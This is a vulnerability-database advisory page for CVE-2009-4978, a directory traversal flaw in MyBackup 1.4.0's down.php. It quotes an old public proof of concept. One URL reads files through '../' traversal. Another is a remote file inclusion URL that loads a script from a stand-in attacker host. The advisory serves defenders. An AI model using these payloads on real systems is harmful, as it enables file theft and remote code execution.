CVE-2009-4978
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
6.0
Description
Directory traversal vulnerability in down.php in MyBackup 1.4.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
mybackup 1.4.0 - File Download / Remote File Inclusion
###############################################################################################
[+] MyBackup 1.4.0 Remote File Inclusion (AFD/RFI) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
################################################################################################
[+] Download Script : http://www.tufat.com/files_lgpl/script_96.zip
[+] Arbitrary File Download
- PoC
http://127.0.0.1/down.php?filename=../../../../../../boot.ini
[+] Remote File Inclusion
- You must be logged in.
http://127.0.0.1/index.php?main_tabid=1&main_content=http://evilsite.com/evilscript.txt
################################################################################################
# milw0rm.com [2009-08-05]Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| tufat | mybackup | 1.4.0 | |
References
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.